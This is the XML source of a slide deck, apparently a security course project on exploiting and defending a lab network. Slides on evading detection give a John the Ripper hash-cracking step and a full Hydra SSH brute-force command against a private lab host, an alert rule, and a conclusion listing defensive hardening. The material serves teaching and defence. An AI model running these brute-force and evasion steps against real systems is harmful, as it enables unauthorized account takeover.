            <a:endParaRPr sz="4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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2502" name="Google Shape;2502;p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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1"/>
              <a:t>Weak Password on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>SSH Port 22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2503" name="Google Shape;2503;p19"/>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24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2504" name="Google Shape;2504;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2019175"/>
            <a:ext cx="22942800" cy="9866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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can you execute the same exploit without triggering the alert?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John wt-hashes.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there alternative exploits that may perform better?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra:</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra -l michael -P /usr/share/wordlists/rockyou.txt --vV 192.168.1.110 ssh </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2505" name="Google Shape;2505;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12751375" y="5809800"/>
            <a:ext cx="11236748" cy="6892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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2510" name="Google Shape;2510;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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege  Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2511" name="Google Shape;2511;p2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25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2512" name="Google Shape;2512;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239175" y="2054300"/>
            <a:ext cx="22942800" cy="9866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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which alerts detect this exploit? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which metrics do they measure? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system.process.cpu.total.pct</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which thresholds do they fire at?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="1" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.5</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" b="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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2517" name="Google Shape;2517;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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Privilege  Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2518" name="Google Shape;2518;p23"/>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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2519" name="Google Shape;2519;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can you execute the same exploit without triggering the alert?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there alternative exploits that may perform better?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If possible, include a screenshot of your stealth technique.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2525" name="Google Shape;2525;g13355dbaffb_2_27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532277" y="85751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a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2526" name="Google Shape;2526;g13355dbaffb_2_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27</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2527" name="Google Shape;2527;g13355dbaffb_2_27"/>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2528" name="Google Shape;2528;g13355dbaffb_2_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206075" y="2555550"/>
            <a:ext cx="22241100" cy="1015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600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Final conclusion for our team as SOC analysts after finding the vulnerabilities as opposed to offensive strategy will be to create Cron jobs for automated alerts when more than one attempts to access ports and use Ansible wide updates for regular system health.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>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3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Continuous mitigation against Wordpress Enumeration can be done by disabling Wordpress Rest API and XML-RPC if its not needed whereas prohibiting exposure of wp-admin and wp-login.php.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>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3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the Salted password hashes via SecureRandom as suggested by OWASP(Open Web Application Security Project) for cryptographically strong passwords via Password management tools.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>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3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening against the escalated privilege access can be avoided initially by the administrator by limiting access to specific department whereas using auditd command to aid in finding any compromised accounts on daily basis whereas proper configuration for the sudoers files.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>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3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools like Fail2Ban can be implemented in the system for hardening against directory exploration which will temporarily ban IP address with excessive 404 errors within a time period following the firewall rules.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>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3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>To Avoid the initial Nmap scan for attacker to get open ports information, we can use the port knocking technique where analyst can manipulate hacker into establishing connection to a networked computer that has no open ports, that will delay the sequence which will give time for SOC analyst to figure out the vulnerability.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="1D1C1D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Following implementation can support our defensive methods against offensive techniques and keep the Network System secure. Thank you</a:t>
            </a:r>
            <a:endParaRPr sz="36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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2534" name="Google Shape;2534;g13355dbaffb_7_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632102" y="55692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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2535" name="Google Shape;2535;g13355dbaffb_7_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28</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2536" name="Google Shape;2536;g13355dbaffb_7_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632100" y="150925"/>
            <a:ext cx="23126325" cy="12976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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="900"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Google Shape;2340;p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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2341" name="Google Shape;2341;p2"/>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3</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2342" name="Google Shape;2342;p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
        <p:nvSpPr>
          <p:cNvPr id="2343" name="Google Shape;2343;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736975" y="5392750"/>
            <a:ext cx="4196700" cy="59112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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
